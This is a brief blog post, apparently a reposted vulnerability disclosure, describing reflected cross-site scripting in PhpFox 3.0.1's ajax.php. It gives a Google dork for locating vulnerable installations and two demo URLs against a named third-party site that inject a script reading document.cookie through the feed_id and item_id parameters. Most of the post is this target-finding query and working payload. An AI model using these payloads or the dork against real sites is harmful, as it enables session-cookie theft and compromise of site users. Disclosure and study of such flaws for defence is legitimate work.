Skip to main content

PhpFox 3.0.1 Cross Site Scripting

PhpFox 3.0.1 Cross Site Scripting | Juno_okyo's Blog

Google Dork: Intext:"Powered By phpFox Version 3.0.1"

Vendor Home : http://www.phpfox.com/

 There are lots of parametrs Vulnerable to xss in ajax.php file like feed_id & message & title & ...
D3m0:

http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id="><script>alert(document.cookie);</script>&item_id=518&_=1346525603467

http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=id&item_id=518"><script>alert(document.cookie);</script>&_=1346525603467

Share this with your friends
Loading...